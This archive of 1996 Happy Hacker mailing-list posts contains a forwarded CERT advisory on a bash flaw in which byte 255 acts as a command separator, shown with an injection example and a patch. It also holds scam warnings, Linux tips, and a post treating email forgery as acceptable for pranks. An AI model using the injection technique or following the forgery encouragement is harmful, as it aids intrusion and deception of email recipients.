Carolyn's most popular book, in 4th edition now!
For advanced hacker studies, read Carolyn's
|
| Subscribe to Happy Hacker |
| Visit this group |
Oct. 1996 posts to Happy Hacker
Tue Oct 08 15:18:30 1996
From: "Carolyn P. Meinel" <>
Subject: CERT Advisory CA-96.22 - Vulnerabilities in bashThis advisory on the bash shell is important to linux users as bash is the preferred linux shell.
Note tht this advisory merely warns that there is a way for bash to be used to execute "arbitrary commands." It doesn't, however, report any specific dastardly deeds known to have been done using bash.
We should presume that some uberhacker types are working right now to turn this bug into interesting exploits. -- CM
>From: CERT Advisory <cert-advisory@cert.org>
>To: cert-advisory@cert.org
>Subject: CERT Advisory CA-96.22 - Vulnerabilities in bash
>Reply-To: cert-advisory-request@cert.org
>Organization: CERT(sm) Coordination Center - +1 412-268-7090
>X-Status:
>
>-----BEGIN PGP SIGNED MESSAGE-----
>
>=============================================================================
>CERT(sm) Advisory CA-96.22
>Original issue date: October 8, 1996
>Last revised: --
>
>Topic: Vulnerabilities in bash
>- ------------------------------------------------------------------------------
> The original technical content for this advisory
> was published by the IBM-ERS response team and
> is used here with their permission.
>
>This advisory describes two problems with the GNU Project's Bourne Again
>SHell (bash): one in yy_string_get() and one in yy_readline_get().
>
>The vulnerability in yy_string_get() allows the character with value 255
>decimal to be used as a command separator. When used in environments where
>users provide strings to be used as commands or arguments to commands, bash
>can be tricked into executing arbitrary commands.
>
>It is not clear whether the problem with yy_readline_get() results in an
>exploitable vulnerability, though you may want to address both problems for
>completeness.
>
>The problems affect bash versions 1.14.6 and earlier.
>
>The CERT/CC team recommends that you upgrade to bash 1.14.7 as soon as
>possible, as discussed in Section III.A below. Section III.B contains a
>patch for 1.14.7, which we recommend using to address the yy_readline_get()
>problem.
>
>We will update this advisory as we receive additional information.
>Please check advisory files regularly for updates that relate to your site.
>
>- ----------------------------------------------------------------------------
>
>I. Description
>
> A. Introduction
>
> The GNU Project's Bourne Again SHell (bash) is a drop-in replacement
> for the UNIX Bourne shell (/bin/sh). It offers the same syntax as the
> standard shell, and it also includes additional functionality such as
> job control, command line editing, and history.
>
> Although bash can be compiled and installed on almost any UNIX
> platform, its most prevalent use is on "free" versions of UNIX such as
> Linux, where it has been installed as "/bin/sh" (the default shell for
> most uses).
>
> The bash source code is freely available from many sites on the
> Internet.
>
> B. Vulnerability Details
>
> 1. Vulnerability in yy_string_get()
>
> There is a variable declaration error in the "yy_string_get()"
> function in the "parse.y" module of the "bash" source code. This
> function is responsible for parsing the user-provided command line
> into separate tokens (commands, special characters, arguments, etc.).
> The error involves the variable "string", which has been declared to
> be of type "char *".
>
> The "string" variable is used to traverse the character string
> containing the command line to be parsed. As characters are
> retrieved from this pointer, they are stored in a variable of type
> "int". On systems/compilers where the "char" type defaults to
> "signed char" this value will be sign-extended when it is assigned
> to the "int" variable. For character code 255 decimal (-1 in two's
> complement form), this sign extension results in the value (-1)
> being assigned to the integer.
>
> However, (-1) is used in other parts of the parser to indicate the
> end of a command. Thus, the character code 255 decimal (377 octal)
> will serve as an unintended command separator for commands given to
> bash via the "-c" option. For example,
>
> bash -c 'ls\377who'
>
> (where "\377" represents the single character with value 255 decimal)
> will execute two commands, "ls" and "who".
>
> 2. Possible vulnerability in yy_readline_get()
>
> A similar problem exists with the "yy_readline_get()" function, which
> is also in the file "parse.y" and which is used to read commands in
> interactive shells (ones that print a prompt and read from the
> keyboard, a shell script, or a pipe).
>
> It is not clear that this problem produces any exploitable
> vulnerabilities in the bash program; however, you may wish to
> address the problem for the sake of completeness.
>
>II. Impact
>
> This unexpected command separator can be dangerous, especially on systems
> such as Linux where bash has been installed as "/bin/sh," when a program
> executes a command with a string provided by a user as an argument using
> the "system()" or "popen()" functions (or by calling "/bin/sh -c string"
> directly).
>
> This is especially true for the CGI programming interface in World Wide
> Web servers, many of which do not strip out characters with value 255
> decimal. If a user sending data to the server can specify the character
> code 255 in a string that is passed to a shell, and that shell is bash,
> the user can execute any arbitrary command with the user-id and
> permissions of the user running the server (frequently "root").
>
> The bash built-in commands "eval," "source," and "fc" are also
> potentially vulnerable to this problem.
>
>III. Solution
>
> A. Vulnerability in yy_string_get
>
> On 27 August 1996, Version 1.14.7 of bash was released. You can
> obtain this new version from:
>
> ftp://slc2.ins.cwru.edu/pub/dist/bash-1.14.7.tar.gz
>
>
> B. Vulnerability in yy_readline_get
>
> It is not clear that this problem produces any exploitable
> vulnerabilities in the "bash" program; however, you may wish to
> address the problem for the sake of completeness.
>
> This problem can be alleviated by applying the patch below to the
> bash source code, then recompiling the program, and installing the
> new version.
>
> The patch below is for Version 1.14.7 of bash. Source code for this
> version can be obtained from the site listed above.
>
>- ---------------------------------- cut here ---------------------------------
>*** parse.y.old Mon Aug 26 11:15:55 1996
>- - - - --- parse.y Wed Aug 28 08:49:15 1996
>***************
>*** 801,807 ****
>
> #if defined (READLINE)
> char *current_readline_prompt = (char *)NULL;
>! char *current_readline_line = (char *)NULL;
> int current_readline_line_index = 0;
>
> static int
>- - - - --- 801,807 ----
>
> #if defined (READLINE)
> char *current_readline_prompt = (char *)NULL;
>! unsigned char *current_readline_line = (unsigned char *)NULL;
> int current_readline_line_index = 0;
>
> static int
>- --------------------------------- cut here ----------------------------------
>
> To apply this patch, save the text between the two "--- cut here ---"
> lines to a file, change directories to the bash source directory,
> and issue the command
>
> patch < filename
>
> If you do not have the patch program, you can obtain it from
>
> ftp://prep.ai.mit.edu/pub/gnu/patch-2.1.tar.gz
>
> or you can apply the patch by hand.
>
> After applying the patch, recompile and reinstall the bash program by
> following the directions in the "INSTALL" file, included as part of
> the bash distribution.
>
>- ----------------------------------------------------------------------------
>The CERT Coordination Center thanks IBM-ERS for permission to reproduce the
>technical content in their IBM Emergency Response Service Security
>Vulnerability Alerts ERS-SVA-E01-1006:004.1 and ERS-SVA-E01-1006:004.2.
>These alerts are copyrighted 1996 International Business Machines Corporation.
>- ----------------------------------------------------------------------------
>
>If you believe that your system has been compromised, contact the CERT
>Coordination Center or your representative in the Forum of Incident Response
>and Security Teams (see ftp://info.cert.org/pub/FIRST/first-contacts).
>
>
>CERT/CC Contact Information
>- ---------------------------
>Email cert@cert.org
>
>Phone +1 412-268-7090 (24-hour hotline)
> CERT personnel answer 8:30-5:00 p.m. EST(GMT-5) / EDT(GMT-4)
> and are on call for emergencies during other hours.
>
>Fax +1 412-268-6989
>
>Postal address
> CERT Coordination Center
> Software Engineering Institute
> Carnegie Mellon University
> Pittsburgh PA 15213-3890
> USA
>
>Using encryption
> We strongly urge you to encrypt sensitive information sent by email. We can
> support a shared DES key or PGP. Contact the CERT/CC for more information.
> Location of CERT PGP key
> ftp://info.cert.org/pub/CERT_PGP.key
>
>Getting security information
> CERT publications and other security information are available from
> http://www.cert.org/
> ftp://info.cert.org/pub/
>
> CERT advisories and bulletins are also posted on the USENET newsgroup
> comp.security.announce
>
> To be added to our mailing list for advisories and bulletins, send your
> email address to
> cert-advisory-request@cert.org
>
>- -----------------------------------------------------------------------------
>© 1996 Carnegie Mellon University
>This material may be reproduced and distributed without permission provided
>it is used for noncommercial purposes and the copyright statement is
>included.
>
>CERT is a service mark of Carnegie Mellon University.
>- -----------------------------------------------------------------------------
>
>This file: ftp://info.cert.org/pub/cert_advisories/CA-96.22.bash_vuls
> http://www.cert.org
> click on "CERT Advisories"
>
>
>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>Revision history
>
>
>
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQCVAwUBMlpe6nVP+x0t4w7BAQGXjQP7BkkMX06QR3nQEV2FV6Qo4p0bVSU88Kef
>a9kjcXhJyUM1gE0QnLNo8dbL5PAUvatlRDowZv71l+UTh0BZum8apq+dpOhe+WF+
>ko95vQEqKbfSkY7FiTrOY/gKJZWMV31ddlwCldl68OKbuRqQg6hfgWSQX264jWb3
>m+nIj5VkuK8=
>=Fodb
>-----END PGP SIGNATURE-----Wed Oct 09 13:39:17 1996
From: Carolyn Meinel <>
Subject: HH: More headers questions>
> (from anonymous)
> BTW, I got on to the machine at my school (IBM-370 i think) and when I tried
> one of the tricks you outlined (mail spoofing without logging on) I didn't get
> any indication where the actual originator was. All it said was FROM: USERNAME,
> TO: ME. Does it mean that I found an old sendmail daemon?
> ---------------It depends on how you read your email. Some programs have pretty wimpy
headers, stripping out lots of useful things. An example is the free version
of Eudora. Other email programs have really, really good headers. The best I
have found is Elm, which runs under Unix.
Before you assume you have found a host that lets you forge really, really
good email, I would suggest checking the headers under Elm.
Even then, if you have what looks like perfectly forged headers, watch out
for using it in a way that might defraud or harass someone. There is no such
thing as the "perfect" crime. But there can certainly be "perfect" pranks.
The next time someone sends in a "Good Times" virus alert to a hacker list,
he or she had darn better use a perfect email forgery scheme! -- CMCarolyn Meinel
M/B Research -- The Technology Brokers
Fri Oct 11 11:22:16 1996
From: Carolyn Meinel <>
Subject: HH: CONCENTRIC NETWORK OBTAINS JUDICIAL RELIEF AGAINST SPAMMER (fwd)---------- Forwarded message ----------
Date: Wed, 9 Oct 1996 16:05:01 -0400 (EDT)
From: Keith Bostic <bostic@bsdi.com>
To: /dev/null@mongoose.bostic.com
Subject: CONCENTRIC NETWORK OBTAINS JUDICIAL RELIEF AGAINST SPAMMERForwarded-by: "Rick Adams" <rick@UU.NET>
CONCENTRIC NETWORK OBTAINS JUDICIAL RELIEF AGAINST SPAMMER
CUPERTINO. Calif., (October 9, 1996)-- Concentric Network Corporation,
a leading provider of tailored network solutions for the rapidly growing
electronic commerce and Internet/intranet markets, today announced that
Cyber Promotions, Inc. and its president Sanford Wallace have been ordered
by a federal judge to swear, under penalty of perjury, that they will cease
engaging in conduct which causes the overload of Concentric's mail system
and the denial of mail service to Concentric Networks' subscribers.In a lawsuit filed against Cyber Promotions and Wallace on October 2,
1996, seeking an injunction, compensatory and punitive damages, Concentric
alleges that the Defendants send unsolicited electronic advertisements, or
"spam," to hundreds of thousands of Internet users on a daily basis and
falsely designate a Concentric Network account as the point of origin of
those messages. According to the suit, this causes tens of thousands of
undeliverable messages to be routed back into Concentric Network's mail
system for processing and storage, resulting in the overload of Concentric's
equipment and the denial of service to its subscribers.On Monday, October 7, a federal judge in the Northern District of
California ordered Wallace and Cyber Promotions to submit an affidavit to
the Court swearing under oath that they would not engage in such conduct in
the future. In the sworn affidavit filed Tuesday, Wallace and Cyber
Promotions stated:"[W]e will not continue to use accounts that have been opened with
Concentric to send or receive e-mail or in connection with the sending or
receiving or e-mail. Moreover, [we] will not open up any new accounts with
Concentric or have anyone on our behalf open an account with Concentric for
the purpose of sending or receiving of e-mail or in connection with the
sending or receiving of e-mail.""We are extremely pleased with the Court's ruling, and the protection we
have been able to secure for our subscribers," said Henry R. Nothhaft,
Concentric's president and CEO. "This practice interferes with subscriber's
ability to effectively use our network. They have asked us to stop it. We
will continue to take steps to protect our customers from this type of
conduct."Concentric's suit alleges that by causing the denial of service to
Concentric's subscribers, the Defendants have acted in violation of the
Computer Fraud and Abuse Act and the Electronic Communications Privacy Act.
Concentric also claims that by falsely representing that the junk e-mail
messages originate from a Concentric account, Defendants have implied that
Concentric supports or condones Cyber Promotions' business practices. In
fact, Concentric's Terms of Service Agreement expressly prohibits the act of
spamming. Concentric encourages their customers to inform the Company of
any further spamming episodes.For complete text of the affidavit refer to Concentric Network's web
site at http://www.concentric.net.
About Concentric Concentric Network Corp., is a fast-growing,
venture-backed private company headquartered in Cupertino, Calif. Founded
in 1991, the company has established itself as a market leader in
providing virtual private networks and consumer Internet access. It has
nearly 250 employees and a data network with 214 POPs in the United States
and Canada. The company is
rapidly deploying a SuperPOP based network which consolidates multiple
smaller POPs within a metropolitan area. The company has a proven ability to
react quickly to market and technology changes and has designed a network
architecture and deployment strategy that promises to cost-effectively
support a wide range of networking applications for enterprise, consumer and
wholesale users. Concentric Network's web address is http://www.concentric.net.dloughli@concentric.net
Donna Loughlin
Public Relations
Concentric Network Corporation
10590 N. Tantau Avenue
Cupertino, CA 95014
(408) 343-2203
Fri Oct 11 11:22:28 1996
From: Carolyn Meinel <>
X-Sender: cmeinel@llama.swcp.com
To: hh@mail.edm.net
Subject: HH: Re: headers (fwd)
X-Loop: cmeinel.com
Message-Id: <Pine.SUN.3.91.961010124800.1926F-100000@llama.swcp.com>
Recieved: by brute.hway.net (950413.SGI.8.6.12/951211.SGI)
This: is a fake header
Do: you see this?
By: for techbr@hway.net id OAA20565; Thu, 10 Oct 1996 14:36
10: email me for free Voice Stream refrigerator magnets!
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-hh@edm.net
Errors-To: owner-hh@edm.net
Precedence: bulk
Reply-To: hh@edm.net
X-UIDL: d956529d5f12fc40cd995bc4c76ea9be
Status: RO
X-Status:
> >From moribund@calweb.com Wed Oct 9 20:40:39 1996
>
> If you go to Special/Settings, Fonts & Display, and then click "Show all
> headers (even the ugly ones)" you'll get all of the headers. And yes, this
> is in Eudora Lite, the free one.Try again with forged email. When I forge email and read it with
different email programs I get different results.I put a bunch of junk in the header of this one. Try reading it first
with elm, then pine, then download it to your PC with Eudora Lite. See if
you get any differences.I email stuff to myself from one of my ISPs to another as another way of
checking what gets stripped off.Carolyn Meinel
M/B Research -- The Technology Brokers
Wed Oct 16 10:52:21 1996
Received: from brute.hway.net (brute.hway.net [207.158.192.66]) by kitsune.swcp.com (8.6.9/8.6.9) with ESMTP id JAA15362 for <cmeinel@swcp.com>; Wed, 16 Oct 1996 09:56:27 -0600
Received: by brute.hway.net (950413.SGI.8.6.12/951211.SGI)
for techbr@hway.net id LAA28107; Wed, 16 Oct 1996 11:56:25 -0400
Received: from mail.edm.net by brute.hway.net via ESMTP (950413.SGI.8.6.12/951211.SGI)
for <> id LAA28093; Wed, 16 Oct 1996 11:56:22 -0400
Received: by mail.edm.net
(1.37.109.16/16.2) id AA109971329; Wed, 16 Oct 1996 08:55:29 -0700
Received: from slug.swcp.com by mail.edm.net with ESMTP
(1.37.109.16/16.2) id AA109931324; Wed, 16 Oct 1996 08:55:24 -0700
Received: (from cmeinel@localhost) by slug.swcp.com (8.6.9/8.6.9) id JAA01045; Wed, 16 Oct 1996 09:55:30 -0600
Date: Wed, 16 Oct 1996 09:55:29 -0600 (MDT)
From: Carolyn Meinel <>
X-Sender: cmeinel@slug.swcp.com
To: hh@mail.edm.net
Subject: HH: Internet ScamBusters #9 (fwd)
X-Loop: cmeinel.com
Message-Id: <Pine.SUN.3.91.961016095442.29760D-100000@slug.swcp.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-hh@edm.net
Errors-To: owner-hh@edm.net
Precedence: bulk
Reply-To: hh@edm.net
X-UIDL: 1a7e82dea1ac616bdb8525729beabcc8
Status: O
X-Status:Internet ScamBusters
- - exposing what really works and what doesn't - -By Audri and Jim Lanford, NETrageous Inc.
© =A9 1996 NETrageous Inc.Issue #9 October 12, 1996
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=3D
More On The "809" SCAM: Internet ScamBusters Uncovers
Additional Serious Implications For The Infamous "809" Scam
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=3DOn Monday we sent out a Special Alert to notify subscribers of the
"809" Scam. We've been doing a lot of research on this scam all
week, and getting *a lot* of email. Last night we uncovered
information which results in much broader implications of this scam
than we've seen reported anywhere. So, we're sending out this
additional issue of Internet ScamBusters to warn you about the new
developments.Brief review: The "809" scam has many permutations but they all
involve a message to you (either by email, phone or pager) that you
immediately call a number in the "809" area code to avoid some bad
consequence (such as litigation, or to receive information about
someone who has been arrested or died) or to gain some good benefit
(such as winning a wonderful prize).The "809" area code is in the Caribbean, yet most people are not
aware that they are making an international call when they dial the
"809" area code. "809" calls can be "pay-per-call" numbers (such as
900 numbers in the US) - and there are no legal requirements that
callers be informed that they are being charged extra. When you
return a "pay-per-call" 809 call, they try to keep you on the phone
as long as possible, and you are charged very high rates for the
call, reportedly up to $25 per minute.New information: Until recently, the "809" area code covered the
entire Caribbean. However, that's changed. There are now a series
of new area codes for different countries in the Caribbean. That
means there are now additional area codes which victims can
unknowingly call with the same results as the original "809" scam.
The "268" area code is already reportedly being used by scam artists.
And you can be sure that the scammers won't take long to start
using these new codes in a big way.According to representatives at AT&T, here are the new area codes and
their effective dates:
Country Code Effective Date
Bahamas 242 October 1, 1996
Barbados 246 July 1, 1996
Antigua 268 April 1, 1996
Cayman Islands 345 September 1, 1996
Monsterrat 664 July 1, 1996
St. Lucia 758 July 1, 1996
Puerto Rico 787 March 1, 1996
St. Kitts/Nevis 869 October 1, 1996
Jamaica 876 October 1, 1996 (conflicting reports-
may still be 809)Bermuda now has the area code of 441.
A few more countries will be changing their area codes in 1997:
N. Commonwealth
of Mariana Is. 670 July 1, 1997
Trinidad &
Dominica 767 October 1, 1997
Tobago 868 June 1, 1997 (however, this may have
already have occurred according to AT&T)Several countries are keeping the 809 area code, such as the
Dominican Republic, Grenada, Virgin Islands, Martinique, St. John
(although St. John may change to 268), St. Thomas, and St. Vincent.(Please note: We spoke with three representatives at AT&T, and they
all gave us slightly different information. For example, they varied
on whether the effective date for Antigua's change was March 1 or
April 1, 1996 and whether Jamaica has a new area code. However, our
concern is with the major concepts rather than with the specific
details.)And there's more. AT&T supplied us with a long list of
"pay-per-call" numbers. The numbers on this list may include adult
sex lines, resume lines, and other "pay-per-call" numbers.(Please note: this list does not include all of the "pay-per-call"
numbers in the Caribbean - and there may be numbers included below
that are not "pay-per-call" numbers. Our purpose here is to warn
readers of the scope of this problem.)Antigua / St. John
268-404-4000 to 404-6999
809-404-7411Dominican Republic
809-404-4000 to 404-6999
809-412-0785 to 412-0787
809-412-0960 to 412-0964
809-414-1000 to 414-1499
809-470-0000 to 414-1949
809-474-0001 to 474-9996
809-476-0105 to 476-0112
809-476-0131 to 476-0135
809-476-0314 to 476-0319
809-476-1001 to 476-1020
809-476-1200 to 476-1229
809-476-1350 to 476-1399
809-476-1400 to 476-1446
809-476-1600 to 476-1629
809-476-1765 to 476-1796
809-476-1930 to 476-1999
809-537-0300 to 537-0899
809-540-5000 to 540-5199
809-563-0000 to 563-0199
809-563-0300 to 563-0699
809-563-9000 to 563-9199
809-563-9300 to 563-9899St. Vincent
809-456-0000 to 456-9999
809-457-0000 to 457-9999
809-458-0000 to 458-9999
809-485-0000 to 485-9999
809-490-0000 to 490-9999
809-493-0000 to 493-9999Summary: Be very careful returning phone numbers to area codes you
don't recognize, especially when you receive calls, emails or pages
with urgent messages that you call these numbers. Call your long
distance phone company's operator to find out where the area code is
located (or look it up on the net), and only call numbers that make
sense to you.++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Two additional "pay-per-call" number scams:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++=3D+
SCAM: Some 800 numbers reportedly roll over to "809" and other
foreign "pay-per-call" numbers with little or no warning.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++A representative at AT&T warned us of a common scam she encounters.
Here's how it works: You see an ad on the Internet or in a newspaper
for an overseas job opportunity as a "secret shopper" or a "mystery
shopper." You call the listed 800 number to either learn more or to
apply for the job. You are left on hold for 15 to 20 minutes. You
are either warned that the call is being rolled over to a toll call,
or you're not warned. However, even when people are warned, they
don't realize that the roll over is to an international,
"pay-per-call" number. When you are finally connected, you're told
all the positions have been filled. When you receive your phone
bill, you have a very large charge.+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SCAM: "809" and other "pay-per-call" numbers can be used to cheat
businesses who offer fax back services.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++Thanks to Lee Jones, who alerted us to this scam: Many companies
offer a computerized fax-back service where the company faxes
requested documents to a phone number entered by the caller. The
caller can get the fax-back service to call back their "pay-per-call"
number. When the business calls this "pay-per-call" fax number to
send the documents, they are charged the very inflated rates. You
should consider protecting your business from this scam by blocking
area codes such as those listed above.++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
An update on the Internet version on the 809 scam we described in the
last issue of Internet ScamBusters:On October 8th, we looked up the domain name and ISP of "Global
Communications," the company that had posted the "809" message we
included in the last issue. We discovered that the domain name,
demon.net, is owned by Demon Systems Limited, in London. We tried
calling Demon many times, but their phone was always busy. We
emailed them asking what they intended to do about this scam, but we
received no reply (other than their automated response that they had
received our email).We also searched the newsgroups to see whether they had posted any
additional information. We found three relevant posts. Here is part
of the response from Mike Whitaker, Duty Postmaster, Demon Internet
Ltd., postmaster@demon.net:----------------------------------------------------------
This message originates from one of our customers and is clearly a
'scam' to persuade people to call the number listed. Demon take a
very dim view of such behaviour, and appropriate action is being
taken.
----------------------------------------------------------Demon Internet has closed "Global Communications" account and is
considering further action.You can be sure that "Global Communications" and other companies like
them will be back soon with different names, phone numbers, email
addresses and messages. Again, it's not the specifics of this scam
that are important - it's watching out for the general principles.Incidentally, if you're curious, several people called the 809 phone
number "Global Communications" posted to discover what actually
happened when you called. Ryan J. Donmoyer, in MONEY Daily on
October 9th, reports:"Callers to the number are led to believe they are talking to
a live person, but in fact it is a clever recording that
responds to the caller's voice. Among other things, an
irate-sounding man with a British accent warns, 'Your
check will come round or we'll come round to get it.' The
recording seems designed to keep callers on the line as
long as possible, and is reportedly billed at $25 per minute."Others reported that this "man" with a British accent kept telling
them to hold on while he picked up other phone calls and supposedly
yelled at his staff. He continued to yell at the callers as well,
saying "send the money," and yelled into other ringing phones as long
as the callers remained on the line.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Corrections and Clarifications to Issue #8 Of Internet ScamBusters:
- According to our sources at AT&T, the number listed in the email
(809 496 2700) is located in the Dominican Republic, not in the
British Virgin Islands or the Bahamas as we reported.- We had a typo in the last issue that implied that the Bahamas and
the British Virgin Islands were the same country - obviously, that's
not true. (Thanks to Kathryn Morris for pointing this out.)- Finally, we hope it goes without saying that we do not view all
Caribbean businesses as fraudulent. Obviously, most Caribbean
businesses are honest. Nor did we name the West Indian language as
"broken English." What we said was the person who answers the phone
in these scams sometimes speaks broken English and pretends not to
understand you to keep you on the line. We certainly did not, and do
not, view West Indian language as "broken English."
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++A plug for our newsletter, NETrageous Results: Stop
wasting your time, effort and money on unsuccessful Internet
marketing. Visit http://www.netrageous.com/netrageous.htmlBTW, we are often asked how we can publish Internet ScamBusters and
yet sell stuff on the Net. The answer is simple: We respect Internet
culture, offer only very high quality products, and give exceptional
guarantees on everything we offer. We are passionate about helping
businesses achieve outstanding success by providing tremendous
value to customers. At the same time, we're committed to helping
people avoid getting ripped off by Internet scams,
misinformation and hype.+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
About Internet ScamBusters
Internet ScamBusters is a free resource to
benefit the commercial Internet community, published by Audri and
Jim Lanford at NETrageous Inc. Feel free to pass along the
entire zine for non-commercial purposes - however, please do not
remove the copyright notice.If you like Internet ScamBusters, please forward it along
or tell your friends where they can subscribe
-email to scambusters@svr.com or at http://www.scambusters.com
We appreciate it!To UNSUBSCRIBE from Internet ScamBusters, send an e-mail to:
scambusters@svr.com and write "unsubscribe" in the subject field.To SUBSCRIBE to Internet ScamBusters, send an e-mail to:
scambusters@svr.com and write "subscribe" in the subject field.To receive a list of PAST ISSUES of Internet ScamBusters, send an
e-mail to: scambusters@svr.com and write ISSUE in the subject field.To COMMENT on Internet ScamBusters, send an e-mail to:
comments@netrageous.com.
(Please do not send comments to this list by clicking reply.
This is a one-way only mailing list.)We welcome your feedback. Please send any questions, comments,
stories about bad experiences, or words of wisdom to help others NOT
get ripped off to comments@netrageous.com (anonymity guaranteed).The disclaimer located at http://www.scambusters.com/disclaimer.html
applies to this zine.Thu Oct 17 08:58:10 1996
From: Carolyn Meinel <>
Subject: HH: Linux newsgroups update
:>From sindekated@sincom.com Wed Oct 16 21:51:03 1996
A lot of the Linux newsgroups have been purged from Usenet recently. They
are now on a Majordomo mailing list site. For information on the Linux
mailing lists available (and there are a lot of them...), write to the
following address:majordomo@vger.rutgers.edu
body of message: listsAnd, for help on how to subscribe to this particular Majordomo site, send
an e-mail to the same site (majordomo@vger.rutgers.edu) with "help" (minus
quotations) in the message body.>From newbie to SysAdmin, this Majordomo site offers everything that a Linux
enthusiast needs, along with a lot of very helpful and friendly people
(much different than Usenet! :) ) that will guide you in your Linux
adventures. Good luck everyone!Sin DeKated
---------------------
> Now if you don't mind getting flamed, you may want to post
questions
> to the amazing number of Usenet news groups that cover Linux. These
include:
>
> comp.os.linux.advocacy Benefits of Linux compared
> comp.os.linux.development.system Linux kernels, device
drivers
> comp.os.linux.x Linux X Window System servers
> comp.os.linux.development.apps Writing Linux applications
> comp.os.linux.hardware Hardware compatibility
> comp.os.linux.setup Linux installation
> comp.os.linux.networking Networking and communications
> comp.os.linux.answers FAQs, How-To's, READMEs, etc.
> linux.redhat.misc
> alt.os.linux Use comp.os.linux.* instead
> alt.uu.comp.os.linux.questions Usenet University helps you
> comp.os.linux.announce Announcements important to Linux
> comp.os.linux.misc Linux-specific topicsThu Oct 17 08:58:13 1996
From: Carolyn Meinel <>
Subject: HH: More on Linux InstallationDate: Wed, 16 Oct 1996 23:30:32 -0800
From: Greg Bulmash <gbhp@worldnet.att.net>An addendum you may want to note. ANYONE wishing to use graphics
above 320x200 REALLY needs to make sure their video card is supported
in the svgalib that they get.MANY mix & match computer makers (store systems, not name-brands)
are using the Trident TGUI 9440 or higher chipset. This is not
presently supported. There is a beta version of Xfree86 that
supports it, but it's a full release with an expiration date
(because it's beta and they want to force you to upgrade), so you'll
have to download it again in 60 days anyway. According to their
FAQ, the actual "release" with the Trident support will be available
sometime before the end of the year.So, if you're going to install Linux and have a Trident 9440 video
board, you may want to wait until January or later to buy your
CD-ROM. You'll have a better chance of getting your card supported
and you'll also probably get a newer kernel release so it'll save you
that much hassle in upgrading later on.Another suggestion is to READ comp.os.linux.setup BEFORE you attempt
to do an install! If you do this, you can often catch people
expressing problems with hardware or installation conflicts you may
end up encountering. I had a fairly smooth install, because I did
some pre-install troubleshooting.I can't use X-windows, FVWM, or any of the fun graphics stuff yet,
though.-Greg
-----------------------------------------------------
|"If you can find a better deal, I'll eat my foot" |
| - Earl "Stumpy" Johnson's famous last words |
-----------------------------------------------------
|Greg Bulmash gbhp@worldnet.att.net|
| Writing, Editing, DTP, Web Design & Sympathy |
-----------------------------------------------------
| Check Out My Humor Zine |
| http://www.bulmash.com |
-----------------------------------------------------
Thu Oct 17 14:08:25 1996
>From sindekated@sincom.com Thu Oct 17 12:24:45 1996
Subject: Re: More on Linux InstallationAgreed if you're going to run X-Windows, but in the meantime, why not go
ahead and do the preliminary Linux install, and just install the card
support update later by downloading it from the 'net? While you're waiting
for the update to config X-Win, you could be exploring Linux for at least a
couple of months, utilizing its communication capabilities and more. :)Also, there is a book being released this month: Linux in a Nutshell, by
Jessica P. Hekman (O' Reilly books, $19.9), that is supposed to be a dream
for learning commands in Linux - which the other books out there on the
market don't seem to cover all that well...Sin DeKated
----------------------------------
> So, if you're going to install Linux and have a Trident 9440 video
> board, you may want to wait until January or later to buy your
> CD-ROM. You'll have a better chance of getting your card supported
> and you'll also probably get a newer kernel release so it'll save you
> that much hassle in upgrading later on.
Fri Oct 18 08:29:56 1996
>From tobin@mail.edm.net Thu Oct 17 17:17:23 1996
Subject: Re: Guide to (mostly) Harmless Hacking
> 1) Although you in theory can run Linux on a 286 with 4 MB RAM and two
> floppy drives, it is *much* easier with a 486 or above with 8 MB RAM, a
> CD-ROM, and at least 200 MB free hard disk space.Note that Linux is normally a full-fledged 32-bit operating system, and,
hence, requires a 386 or higher processor. The 286 isn't 32-bit. However,
there is a distribution of Linux in development (the name eludes me
currently, might be Linux86 or something) which will run on the z80, 8088,
8086, and 286. I don't think that there is a working, distributed version
of this available yet, though.
> 2) Know as much as possible about what type of mother board, modem, hard
> disk, CD-ROM, and video card you have. If you have any documentation for
> these, have them on hand to reference during installation.Especially your monitor and video card if you want to setup X.
> 6) Buy a book or two or three on Linux. I didn't like any of them! But
they
> are better than nothing. Most books on Linux come with one or two CD-ROMsAlso, the HOWTO documents, although often out of date, are of great help.
> The best I have found is http://sunsite.unc.edu:/pub/Linux/. It
Also try http://sunsite.unc.edu/linux. There are billions of links from
there and it's updated relatively often. Great starting point in any case.
> Tobin Fricke has also pointed out that "free copies of Linux
CD-ROMs
> are available the Linux Support & CD Givaway web site at
> http://emile.math.ucsb.edu:8000/giveaway.html. This is a project whereWow! I'm being quoted. I feel special!
> How about Linux security? Yes, Linux, like every operating
system,
> is imperfect. Eminently hackable, if you really want to know. So if you
want
> to find out how to secure your Linux system, or if you should come acrossOne thing to keep in mind is that most vulnerabilities in Linux and other
Unix operating systems are not due to inherent flaws in the system but
rather due to misconfigurations on the part of the system adminstrator.
However, it is true that there are a few flaws in Linux itself.
Fortunately, shortly after any flaw is made public, a patch invariably
shows up. (-:On a side note, if anyone has a Windows machine and a Linux machine on an
ethernet, there is a program called SAMBA and a filesystem called ksmbfs
that will allow your windows computer to mount shares on the linux machine,
and vice-versa, respectively.Tobin
Fri Oct 18 08:30:07 1996
From: "Sin DeKated" <sindekated@sincom.com>
Subject: Re: More on Linux InstallationAgreed if you're going to run X-Windows, but in the meantime, why not go
ahead and do the preliminary Linux install, and just install the card
support update later by downloading it from the 'net? While you're waiting
for the update to config X-Win, you could be exploring Linux for at least a
couple of months, utilizing its communication capabilities and more. :)Also, there is a book being released this month: Linux in a Nutshell, by
Jessica P. Hekman (O' Reilly books, $19.9), that is supposed to be a dream
for learning commands in Linux - which the other books out there on the
market don't seem to cover all that well...Sin DeKated
----------------------------------
> So, if you're going to install Linux and have a Trident 9440 video
